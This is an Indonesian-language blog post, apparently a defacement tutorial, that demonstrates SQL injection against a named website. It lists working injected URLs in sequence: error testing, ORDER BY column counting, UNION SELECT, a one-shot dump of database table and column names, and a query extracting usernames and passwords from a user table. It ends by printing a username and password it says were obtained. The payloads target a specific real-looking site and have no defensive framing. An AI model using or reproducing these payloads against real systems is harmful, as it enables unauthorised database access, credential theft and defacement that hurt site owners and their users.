Hallo ker, saya akan kasih materi cara deface poc SQL INJECTION..
Apa itu SQL injection?:
Sql Injection adalah sebuah teknik Hacking di mana penyerang bisa meng akses sistem database yg berbasis SQL.. (Structured Queery language)
Oke dikit aja v":
Di sini sy punya target:
Target:https://www.patarasih.com/detailartikel.php?id=1
Oke seperti biasa kita menambahkan di Depan parameter: (') "tanpa tanda kurung", untuk mengecek apakah website nya Error' Atau tidak..
Klo udah kalian tambahkan (--+-)
Seperti: https://www.patarasih.com/detailartikel.php?id=1%27--+-
Kembali normal Ya berarti web nya Vulen.
Langsung order by aja:
https://www.patarasih.com/detailartikel.php?id=1'+order+by+3--+-
Error:
https://www.patarasih.com/detailartikel.php?id=1'+order+by+4--+-
Error':
https://www.patarasih.com/detailartikel.php?id=1'+order+by+5--+-
Normal, nah klo normal kita Union Select sampai 5
https://www.patarasih.com/detailartikel.php?id=1'and 0 union select 1,2,3,4,5--+-
Togel nya di 4, kita masukin Dios dump database: di angka 4
https://www.patarasih.com/detailartikel.php?id=1'and 0 union select 1,2,3,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,00,column_name))))x),5--+-
Oke muncul database nya: kalian cari username password, cara nge dump pw?
https://www.patarasih.com/detailartikel.php?id=1'and 0 union select 1,2,3,group_concat(username,0x3a,password),5 from user--+-
Pw nya hash
Username: rolas
Password: horaslae
Thanks
Comments
Post a Comment